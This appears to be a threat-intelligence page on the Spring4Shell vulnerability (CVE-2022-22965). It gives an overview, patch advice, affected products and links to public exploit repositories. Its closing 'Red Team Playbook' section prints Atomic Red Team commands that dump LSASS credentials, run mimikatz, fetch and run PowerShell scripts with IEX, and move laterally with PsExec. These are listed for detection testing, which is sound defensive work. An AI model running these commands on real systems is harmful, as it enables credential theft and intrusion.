CVE-2022-22965
Overview
This vulnerability is a remote code execution flaw arising from unsafe data binding in Spring MVC and Spring WebFlux components. The root cause lies in the deserialization process that allows attacker-controlled input to manipulate internal class loader resources. The flaw specifically affects applications running on Java Development Kit 9 or higher when deployed as WAR files on Tomcat servers, exposing the data binding mechanism to exploitation.
Vulnerability Description
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
Impact
An unauthenticated attacker can execute arbitrary code remotely on affected systems by sending crafted HTTP requests, enabling full system compromise. This includes executing malware, accessing sensitive information, modifying data, and gaining persistent control over the server. Exploitation requires no user interaction or credentials but does require the application to be deployed as a WAR on Tomcat with JDK 9 or higher. Successful attacks can lead to data breaches, service disruption, and lateral movement within enterprise environments.
Solution
Apply vendor patches as detailed in the VMware advisory at https://tanzu.vmware.com/security/cve-2022-22965, Cisco advisory cisco-sa-java-spring-rce-Zx9GUc67, and Oracle CPU April 2022 at https://www.oracle.com/security-alerts/cpuapr2022.html. VMware recommends upgrading to patched Spring Framework versions that address this issue. Oracle and Cisco provide specific product updates for their affected components. Follow vendor instructions for updating Spring Framework and related products. Avoid deploying Spring applications as WAR on Tomcat if possible, or apply recommended configuration mitigations as per advisories.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from a critical flaw in Spring MVC and Spring WebFlux applications that utilize data binding, particularly when deployed on Tomcat as a WAR file. This flaw allows for remote code execution (RCE), which can be exploited by an attacker to execute arbitrary code on the server. The vulnerability is particularly concerning as it affects applications running on Java Development Kit (JDK) versions 9 and above. The nature of the vulnerability hinges on the way data binding is handled, which can inadvertently allow malicious input to be processed and executed by the application. This flaw is exacerbated by the fact that many developers may not be aware of the specific configurations that render their applications vulnerable, especially when using standard deployment practices.
Attack vectors for this vulnerability primarily involve sending specially crafted requests to the affected application. An attacker could exploit this vulnerability by manipulating input data that is bound to the application's model objects. For instance, by crafting a malicious payload that gets bound to a property of a model object, the attacker can trigger the execution of arbitrary code. This scenario is particularly feasible in environments where input validation is lax or where the application is configured to accept user input without stringent checks. Furthermore, while the default deployment method using Spring Boot (as an executable JAR) mitigates this risk, the widespread use of WAR deployments in enterprise applications means that many systems remain at risk.
The real-world impact of this vulnerability can be severe, leading to significant business risks. Successful exploitation could allow attackers to gain full control over the affected server, leading to data breaches, service disruptions, and potential financial losses. Organizations that rely on Spring-based applications for critical business functions may find themselves exposed to reputational damage and regulatory scrutiny, especially if sensitive customer data is compromised. The high CVSS score of 9.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from security teams to assess their exposure and implement necessary safeguards.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, conducting thorough security assessments and code reviews of applications using Spring MVC or Spring WebFlux is essential to identify any instances of insecure data binding. Implementing input validation and sanitization practices can significantly reduce the risk of exploitation. Furthermore, organizations should consider deploying Web Application Firewalls (WAFs) that can help detect and block malicious requests targeting this vulnerability. Regularly updating and patching affected frameworks, along with monitoring for unusual application behavior, will also be crucial in maintaining a secure environment.
In conclusion, the vulnerability associated with Spring MVC and Spring WebFlux applications represents a significant risk to organizations that deploy these technologies. The potential for remote code execution through data binding highlights the importance of secure coding practices and robust application security measures. By understanding the technical details of the vulnerability, recognizing potential attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2022-22965, indicating a modest resurgence in exploitation attempts targeting vulnerable Spring MVC and Spring WebFlux applications running on JDK 9+ with Tomcat WAR deployments. While the overall exploitation trend remains stable, this uptick underscores persistent adversary interest and ongoing reconnaissance or attack efforts. Notably, no new ransomware campaigns have been linked to this vulnerability, and high-confidence associations with known threat groups remain absent despite prior low-confidence ties to actors such as akira and UNC3886. The availability of multiple proof-of-concept exploits continues to facilitate attacker experimentation and potential weaponization. This development maintains the vulnerability’s critical risk posture, reinforcing the need for sustained vigilance in detection and response, as the environment remains conducive to exploitation attempts despite no rapid escalation in activity.
Affected Products (97)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Spring Framework | All |
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Framework | All |
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
|
|
|
Cisco | Cx Cloud Agent | All |
cpe:2.3:a:cisco:cx_cloud_agent:*:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Automated Test Suite | 1.9.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Automated Test Suite | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Console | 1.9.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Console | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_console:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Exposure Function | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_exposure_function:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Function Cloud Native Environment | 1.10.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Function Cloud Native Environment | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Repository Function | 1.15.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Repository Function | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Slice Selection Function | 1.8.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.8.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Slice Selection Function | 1.15.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.15.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Slice Selection Function | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Policy | 1.15.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.15.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Policy | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_policy:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Security Edge Protection Proxy | 1.7.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:1.7.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Security Edge Protection Proxy | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Unified Data Repository | 1.15.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.15.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Spring Framework Class property RCE (Spring4Shell)
exploits/multi/http/spring_framework_rce_spring4shell
|
- | Unknown | - | View |
GitHub PoCs (101)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
reznok/Spring4Shell-POC
Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit
|
reznok | 324 | 239 | 2022-03-31 | View |
|
BobTheShoplifter/Spring4Shell-POC
Spring4Shell Proof Of Concept/And vulnerable application CVE-2022-22965
|
BobTheShoplifter | 377 | 112 | 2022-03-30 | View |
|
TheGejr/SpringShell
Spring4Shell - Spring Core RCE - CVE-2022-22965
|
TheGejr | 131 | 82 | 2022-03-30 | View |
|
tpt11fb/SpringVulScan
burpsuite 的Spring漏洞扫描插件。SpringVulScan:支持检测:路由泄露|CVE-2022-22965|CVE-2022-22963|CVE-2022-22947|CVE-2016-4977
|
tpt11fb | 154 | 6 | 2022-06-19 | View |
|
zangcc/CVE-2022-22965-rexbb
CVE-2022-22965\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。
|
zangcc | 102 | 15 | 2022-12-28 | View |
|
alt3kx/CVE-2022-22965
Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
|
alt3kx | 99 | 14 | 2022-04-07 | View |
|
SecNN/SpringFramework_CVE-2022-22965_RCE
SpringFramework 远程代码执行漏洞CVE-2022-22965
|
SecNN | 72 | 17 | 2022-04-01 | View |
|
4nth0ny1130/spring4shell_behinder
CVE-2022-22965写入冰蝎webshell脚本
|
4nth0ny1130 | 62 | 21 | 2022-04-07 | View |
|
Mr-xn/spring-core-rce
CVE-2022-22965 : about spring core rce
|
Mr-xn | 50 | 18 | 2022-03-30 | View |
|
FourCoreLabs/spring4shell-exploit-poc
Exploit a vulnerable Spring application with the Spring4Shell (CVE-2022-22965) Vulnerability.
|
FourCoreLabs | 44 | 12 | 2022-03-31 | View |
|
tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce
批量无损检测CVE-2022-22965
|
tangxiaofeng7 | 39 | 14 | 2022-04-01 | View |
|
Kirill89/CVE-2022-22965-PoC
|
Kirill89 | 32 | 21 | 2022-03-31 | View |
|
colincowie/Safer_PoC_CVE-2022-22965
A Safer PoC for CVE-2022-22965 (Spring4Shell)
|
colincowie | 44 | 7 | 2022-03-31 | View |
|
k3rwin/spring-core-rce
spring框架RCE漏洞 CVE-2022-22965
|
k3rwin | 28 | 11 | 2022-03-31 | View |
|
liangyueliangyue/spring-core-rce
springFramework_CVE-2022-22965_RCE简单利用
|
liangyueliangyue | 26 | 6 | 2022-03-31 | View |
|
DDuarte/springshell-rce-poc
CVE-2022-22965 - CVE-2010-1622 redux
|
DDuarte | 19 | 12 | 2022-03-31 | View |
|
p1ckzi/CVE-2022-22965
spring4shell | CVE-2022-22965
|
p1ckzi | 23 | 7 | 2022-04-12 | View |
|
alt3kx/CVE-2022-22965_PoC
Spring Framework RCE (Quick pentest notes)
|
alt3kx | 17 | 7 | 2022-03-31 | View |
|
Bouquets-ai/CVE-2022-22965-GUItools
spring-core单个图形化利用工具,CVE-2022-22965及修复方案已出
|
Bouquets-ai | 17 | 6 | 2022-03-31 | View |
|
wjl110/CVE-2022-22965_Spring_Core_RCE
CVE-2022-22965\Spring-Core-RCE堪比关于 Apache Log4j2核弹级别漏洞exp的rce一键利用
|
wjl110 | 16 | 7 | 2022-04-02 | View |
|
me2nuk/CVE-2022-22965
Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965
|
me2nuk | 14 | 8 | 2022-04-01 | View |
|
itsecurityco/CVE-2022-22965
Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5
|
itsecurityco | 16 | 3 | 2022-04-03 | View |
|
viniciuspereiras/CVE-2022-22965-poc
CVE-2022-22965 poc including reverse-shell support
|
viniciuspereiras | 13 | 5 | 2022-03-31 | View |
|
fracturelabs/go-scan-spring
Vulnerability scanner for Spring4Shell (CVE-2022-22965)
|
fracturelabs | 12 | 2 | 2022-04-04 | View |
|
zer0yu/CVE-2022-22965
Spring4Shell (CVE-2022-22965)
|
zer0yu | 12 | 1 | 2022-04-01 | View |
|
gpiechnik2/nmap-spring4shell
Nmap Spring4Shell NSE script for Spring Boot RCE (CVE-2022-22965)
|
gpiechnik2 | 8 | 4 | 2022-04-03 | View |
|
sunnyvale-it/CVE-2022-22965-PoC
CVE-2022-22965 (Spring4Shell) Proof of Concept
|
sunnyvale-it | 7 | 3 | 2022-04-04 | View |
|
GuayoyoCyber/CVE-2022-22965
Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ (CVE-2022-22965 aka "Spring4Shell")
|
GuayoyoCyber | 6 | 3 | 2022-03-31 | View |
|
Loneyers/Spring4Shell
Spring4Shell , Spring Framework RCE (CVE-2022-22965) , Burpsuite Plugin
|
Loneyers | 4 | 5 | 2022-04-11 | View |
|
Wrin9/CVE-2022-22965
CVE-2022-22965 POC
|
Wrin9 | 7 | 1 | 2022-04-02 | View |
|
nu0l/CVE-2022-22965
Spring-0day/CVE-2022-22965
|
nu0l | 4 | 3 | 2022-04-01 | View |
|
wikiZ/springboot_CVE-2022-22965
CVE-2022-22965 pocsuite3 POC
|
wikiZ | 6 | 1 | 2022-04-07 | View |
|
mariomamo/CVE-2022-22965
|
mariomamo | 5 | 1 | 2022-04-23 | View |
|
netcode/Spring4shell-CVE-2022-22965-POC
Another spring4shell (Spring core RCE) POC
|
netcode | 3 | 3 | 2022-04-04 | View |
|
BKLockly/CVE-2022-22965
Poc&Exp,支持批量扫描,反弹shell
|
BKLockly | 3 | 3 | 2023-06-03 | View |
|
LudovicPatho/CVE-2022-22965_Spring4Shell
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data b...
|
LudovicPatho | 2 | 3 | 2022-04-05 | View |
|
iloveflag/Fast-CVE-2022-22965
CVE-2022-22965图形化检测工具
|
iloveflag | 4 | 0 | 2022-11-08 | View |
|
wshon/spring-framework-rce
CVE-2022-22965
|
wshon | 4 | 0 | 2022-04-01 | View |
|
khidottrivi/CVE-2022-22965
|
khidottrivi | 4 | 0 | 2022-04-27 | View |
|
fracturelabs/spring4shell_victim
Intentionally vulnerable Spring app to test CVE-2022-22965
|
fracturelabs | 2 | 2 | 2022-04-04 | View |
|
jakabakos/CVE-2022-22965-Spring4Shell
PoC and exploit for CVE-2022-22965 Spring4Shell
|
jakabakos | 2 | 2 | 2023-06-20 | View |
|
likewhite/CVE-2022-22965
CVE-2022-22965 EXP
|
likewhite | 3 | 0 | 2022-04-01 | View |
|
0xrobiul/CVE-2022-22965
Exploit Of Spring4Shell!
|
0xrobiul | 3 | 0 | 2022-04-05 | View |
|
rwincey/spring4shell-CVE-2022-22965
|
rwincey | 2 | 1 | 2022-03-31 | View |
|
bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-
A simple python script for a firewall rule that blocks incoming requests based on the Spring4Shell (CVE-2022-22965) vuln...
|
bL34cHig0 | 2 | 1 | 2023-05-31 | View |
|
CalumHutton/CVE-2022-22965-PoC_Payara
|
CalumHutton | 3 | 0 | 2022-04-07 | View |
|
datawiza-inc/spring-rec-demo
The demo code showing the recent Spring4Shell RCE (CVE-2022-22965)
|
datawiza-inc | 2 | 1 | 2022-04-06 | View |
|
D1mang/Spring4Shell-CVE-2022-22965
EXP for Spring4Shell(CVE-2022-22965)
|
D1mang | 2 | 1 | 2022-07-05 | View |
|
cxzero/CVE-2022-22965-spring4shell
CVE-2022-22965 Spring4Shell research & PoC
|
cxzero | 1 | 1 | 2022-05-19 | View |
|
twseptian/cve-2022-22965
Spring4Shell - CVE-2022-22965
|
twseptian | 2 | 0 | 2022-04-04 | View |
|
mylo-2001/GhostStrike
Fully automated Spring4Shell (CVE-2022-22965) + GitLab RCE framework
|
mylo-2001 | 1 | 1 | 2025-11-20 | View |
|
lcarea/CVE-2022-22965
|
lcarea | 1 | 1 | 2022-04-01 | View |
|
irgoncalves/irule-cve-2022-22965
|
irgoncalves | 2 | 0 | 2022-04-06 | View |
|
Joe1sn/CVE-2022-22965
CVE-2022-22965 Environment
|
Joe1sn | 1 | 0 | 2022-04-01 | View |
|
daniel0x00/Invoke-CVE-2022-22965-SafeCheck
PowerShell port of CVE-2022-22965 vulnerability check by colincowie.
|
daniel0x00 | 1 | 0 | 2022-04-04 | View |
|
clemoregan/SSE4-CVE-2022-22965
CVE-2022-22965 proof of concept
|
clemoregan | 1 | 0 | 2022-11-28 | View |
|
gokul-ramesh/Spring4Shell-PoC-exploit
Demonstrable Proof of Concept Exploit for Spring4Shell Vulnerability (CVE-2022-22965)
|
gokul-ramesh | 1 | 0 | 2023-03-12 | View |
|
salo-404/firewall
🔒 Spring4Shell Firewall Defense — Cybersecurity Incident Simulation This project is part of a Cybersecurity Job Simulati...
|
salo-404 | 1 | 0 | 2025-08-06 | View |
|
devengpk/CVE-2022-22965
|
devengpk | 0 | 1 | 2022-12-12 | View |
|
dbgee/Spring4Shell
Spring rce environment for CVE-2022-22965
|
dbgee | 0 | 1 | 2023-06-07 | View |
|
LucasPDiniz/CVE-2022-22965
Spring4Shell Vulnerability RCE - CVE-2022-22965
|
LucasPDiniz | 0 | 1 | 2023-11-12 | View |
|
0xBlackash/CVE-2022-22965
CVE-2022-22965
|
0xBlackash | 0 | 1 | 2026-03-01 | View |
|
c4mx/CVE-2022-22965_PoC
|
c4mx | 1 | 0 | 2022-04-21 | View |
|
helsecert/CVE-2022-22965
|
helsecert | 1 | 0 | 2022-04-01 | View |
|
Snip3R69/spring-shell-vuln
Spring has Confirmed the RCE in Spring Framework. The team has just published the statement along with the mitigation gu...
|
Snip3R69 | 1 | 0 | 2022-04-05 | View |
|
RootEvil333/CVE-2022-22965
CVE-2022-22965
|
RootEvil333 | 0 | 0 | 2026-07-07 | View |
|
Kuri119/CVE-2022-22965-Spring4Shell
|
Kuri119 | 0 | 0 | 2026-06-30 | View |
|
ernestom-commits/jfrog-apptrust-demo
JFrog AppTrust lifecycle policy enforcement demo — shows release gate blocking CVE-2022-22965 (Spring4Shell) with waiver...
|
ernestom-commits | 0 | 0 | 2026-06-21 | View |
|
march0n/PoC-CVE-2022-22965-Spring4Shell
Description
|
march0n | 0 | 0 | 2026-05-27 | View |
|
YUTING-HUANG0/Spring4Shell-CTF
Spring4Shell (CVE-2022-22965) 漏洞環境搭建與 CTF 題目
|
YUTING-HUANG0 | 0 | 0 | 2026-05-27 | View |
|
felisha-elmer/Sandbox-Challenge-Spring4Shell-CVE-2022-22965-
|
felisha-elmer | 0 | 0 | 2026-05-22 | View |
|
mebibite/springhound
Created after the disclosure of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences...
|
mebibite | 0 | 0 | 2022-04-01 | View |
|
snicoll-scratches/spring-boot-cve-2022-22965
Showcase of overridding the Spring Framework version in older Spring Boot versions
|
snicoll-scratches | 0 | 0 | 2022-04-01 | View |
|
mwojterski/cve-2022-22965
|
mwojterski | 0 | 0 | 2022-04-02 | View |
|
0xr1l3s/CVE-2022-22965
Spring4Shell is a critical RCE vulnerability in the Java Spring Framework and is one of three related vulnerabilities pu...
|
0xr1l3s | 0 | 0 | 2022-04-05 | View |
|
Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-
exploitation script tryhackme
|
Omaraitbenhaddi | 0 | 0 | 2022-04-13 | View |
|
Enokiy/spring-RCE-CVE-2022-22965
|
Enokiy | 0 | 0 | 2022-04-29 | View |
|
c33dd/CVE-2022-22965
🚀 Exploit for Spring core RCE in C [ wip ]
|
c33dd | 0 | 0 | 2023-03-02 | View |
|
sohamsharma966/Spring4Shell-CVE-2022-22965
|
sohamsharma966 | 0 | 0 | 2023-09-02 | View |
|
ESSAFAR/Firewall-Rules
Firewall rules to mitigate a zero-day vulnerability malware attack (CVE-2022-22965), known as Spring4Shell
|
ESSAFAR | 0 | 0 | 2023-11-21 | View |
|
Aur3ns/Block-Spring4Shell
POC firewall with rules designed to detect and block Spring4Shell vulnerability (CVE-2022-22965) exploit
|
Aur3ns | 0 | 0 | 2024-11-02 | View |
|
brunoh6/web-threat-mitigation
Hands-on lab on detecting and mitigating web app threats using OWASP ZAP, Burp Suite, and ModSecurity WAF (with OWASP CR...
|
brunoh6 | 0 | 0 | 2025-06-11 | View |
|
Nosie12/fire-wall-server
Python-based simulated firewall to detect and block Spring4Shell (CVE-2022-22965) exploit attempts. This project filters...
|
Nosie12 | 0 | 0 | 2025-08-01 | View |
|
shoucheng3/spring-projects__spring-framework_CVE-2022-22965_5-2-19-RELEASE
|
shoucheng3 | 0 | 0 | 2025-08-20 | View |
|
nhattanhh/CVE-2022-22965
Spring4Shell
|
nhattanhh | 0 | 0 | 2025-12-22 | View |
|
aditidutta696-dev/Spring4Shell-CVE-2022-22965-Exploitation-Attempt
|
aditidutta696-dev | 0 | 0 | 2026-02-03 | View |
|
dbwlsdnr95/CVE-2022-22965
|
dbwlsdnr95 | 0 | 0 | 2025-12-20 | View |
|
te5t321/Spring4Shell-CVE-2022-22965.py
Script to check for Spring4Shell vulnerability
|
te5t321 | 0 | 0 | 2022-04-11 | View |
|
osungjinwoo/CVE-2022-22965
Spring4Shell (POC)
|
osungjinwoo | 0 | 0 | 2025-08-01 | View |
|
ajith737/Spring4Shell-CVE-2022-22965-POC
User friendly Spring4Shell POC
|
ajith737 | 0 | 0 | 2023-01-03 | View |
|
xsxtw/SpringFramework_CVE-2022-22965_RCE
|
xsxtw | 0 | 0 | 2024-05-01 | View |
|
xenosf/CS4239-Spring4Shell-POC
CVE-2022-22965 proof of concept for CS4239 report
|
xenosf | 0 | 0 | 2025-11-14 | View |
|
guigui237/Expoitation-de-la-vuln-rabilit-CVE-2022-22965
|
guigui237 | 0 | 0 | 2024-11-05 | View |
|
jashan-lefty/Spring4Shell
In this challenge, I analyzed the Spring4Shell (CVE-2022-22965) vulnerability, investigated security bypasses, and wrote...
|
jashan-lefty | 0 | 0 | 2025-02-03 | View |
|
NickoPS87/Spring4Shell-Python-Firewall-POC
Proof-of-Concept (POC) of a simple firewall in Python designed to mitigate the Spring4Shell (CVE-2022-22965) RCE attack ...
|
NickoPS87 | 0 | 0 | 2025-10-19 | View |
|
luoqianlin/CVE-2022-22965
Spring Framework RCE Exploit
|
luoqianlin | 0 | 0 | 2022-04-05 | View |
|
t3amj3ff/Spring4ShellPoC
Spring4Shell PoC (CVE-2022-22965)
|
t3amj3ff | 0 | 0 | 2022-04-07 | View |
|
fransvanbuul/CVE-2022-22965-susceptibility
|
fransvanbuul | 0 | 0 | 2022-04-09 | View |
|
ClemExp/CVE-2022-22965-PoC
|
ClemExp | 0 | 0 | 2022-11-28 | View |
|
Shakur1314/CVE-2022-22965-Spring4Shell-Security-Operations-Analysis
A comprehensive Security Operations Centre (SOC) incident response simulation demonstrating threat detection, triage, an...
|
Shakur1314 | 0 | 0 | 2026-01-14 | View |
|
suyash-R-K/dfir-malware-investigation
Spring4Shell (CVE-2022-22965) DFIR lab with exploit simulation, Python WAF, IOC-based detection, and PCAP analysis.
|
suyash-R-K | 0 | 0 | 2026-01-20 | View |
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
